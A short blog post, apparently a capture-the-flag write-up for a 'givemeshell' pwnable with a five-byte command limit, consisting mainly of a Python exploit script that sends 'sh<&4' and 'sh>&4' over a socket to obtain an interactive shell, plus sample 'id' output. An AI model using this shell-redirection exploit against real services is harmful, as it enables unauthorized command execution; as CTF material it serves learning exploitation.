Blog | Tag | Local | Media | Guest | Login  RSS

Category : Pwnables 


givemeshell

 

Summary : 5byte command


Exploit

#!/usr/bin/python


from socket import *


HOST = "192.168.123.134"

PORT = 7879


cmd = ""


s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

s.send("sh<&4")

s.send("sh>&4\n")

while 1:

cmd = raw_input("$ ")

if cmd == "exit":

break

else:

s.send(cmd+"\n")

print s.recv(1024)

s.close()



root@ubuntu:~/givemeshell# ./exploit.py 

$ id

uid=1005(givemeshell) gid=1005(givemeshell) groups=1005(givemeshell) 




저작자 표시
신고

Гітара Martin| 2013.08.23 21:02 신고 | PERMALINK | EDIT/DEL | REPLY
감사합니다
Name
Password
Homepage
비밀글 (Secret)

티스토리 툴바